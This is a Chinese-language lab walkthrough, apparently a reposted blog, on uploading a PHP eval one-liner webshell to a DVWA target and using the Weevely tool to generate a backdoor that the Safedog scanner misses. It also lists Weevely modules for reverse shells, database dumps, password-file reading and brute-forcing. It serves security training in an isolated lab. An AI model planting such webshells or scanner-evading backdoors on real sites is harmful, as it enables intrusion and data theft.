045-使用Weevely工具上传一句话木马

045-使用Weevely工具上传一句话木马


使用Weevely工具上传一句话木马

实验环境说明:

渗透机:kali-7(Kali Linux) 用户名:root 密码:toor

靶   机:win08-16(Windows 2008) 用户名:administrator 密码:P@ssw0rd

第一步,启动实验虚拟机,分别查看虚拟机IP地址:

Kali Linux

Windows 2008

第二步,输入firefox命令来打开火狐浏览器,然后在地址栏里输入靶机的地址访问网页,

使用默认用户名admin密码password登录

第三步,点击DVWA Security 将安全级别设置为low

 

第四步,在/root目录下生成一个shell.php文件,文件内容为php一句话木马:

<?php eval($_POST[‘hello’]);?>

转到File Upload页面然后点击Browse选择刚生成的shell.php一句话木马文件进行上传

第五步,使用网站安全狗对网页根路径进行常规扫描

点击自定义路径扫描,来检测网站安全性

通过扫描结果发现shell.php一句话木马被检测到

第六步,打开终端,使用weevely命令来启动工具

连接weevely生成的木马 : weevely <URL> <password> [cmd]

加载session会话文件 : weevely session <path> [cmd]

生成weevely后门木马文件 :       weevely generate <password> <path>

使用weevely -h来查看工具完整的使用方法

第七步,使用命令weevely generate hello /root/hello.php(hello为密码,/root/hello.php为输出路径)来生成weevely一句话木马

第八步,再次将生成的木马上传至目标靶机网站上,详细步骤参考第六步操作,并在靶机服务器上重新扫描扫描结果如下,还是只检测到shell.php而hello.php并未检测出为网页木马

第九步,使用命令weevely http://172.16.1.200/hackable/uploads/hello.php hello连接weevely木马

输入任意键回车后进入虚拟终端界面

在虚拟终端模式,按Tab键查看可以利用的weevley模块,在需要使用的模块前面加上“:”

第十步,使用命令:audit_phpconf 查看目标靶机服务器php的配置文件


第十一步,使用:file_upload /root/hello.php backdoor.php上传本地文件到目标服务器上

第十三步,使用命令:file_check来检查目标站点下文件的状态及参数信息(md5值,大小,权限等)

下面file_check对应的命令的具体作用为::file_check Md5 文件的md5值、:file_check size文件大小、:file_check file判断是文件还是文档、:file_check exists判断文件是否存在、:file_check perms文件权限值、:file_check datetime创建日期

总结一下weevely常用的模块

system.info   //收集系统信息文件         

file.rm           //删除文件

file.read        //读文件

file.upload        //上传本地文件

file.check        //检查文件的权限和

file.enum        //在本地词表的书面枚举远程文件

file.download        //下载远程二进制/ ASCII文件到本地SQL

sql.query        //执行SQL查询

sql.console        //启动SQL控制台

sql.dump        //获取SQL数据库转储

sql.summary        //获取SQL数据库中的表和列后门

backdoor.tcp                //TCP端口后门

backdoor.install        //安装后门

backdoor.reverse_tcp        //反弹枚举

audit.user_files        //在用户家中列举常见的机密文件

audit.user_web_files        //列举常见的Web文件

audit.etc_passwd        //枚举/etc/passwd查找

find.webdir        //查找可写的web目录

find.perm        //查找权限可读/写/可执行文件和目录

find.name        //按名称查找文件和目录

find.suidsgid        //查找SUID / SGID文件和目录暴破

bruteforce.sql                //暴力破解单一SQL用户

bruteforce.sql_users        //暴力破解SQL密码

bruteforce.ftp               // 暴力破解单一FTP用户

bruteforce.ftp_users        //暴力破解FTP密码

实验结束,关闭虚拟机。

猜你喜欢

转载自blog.csdn.net/qq_50377269/article/details/125017450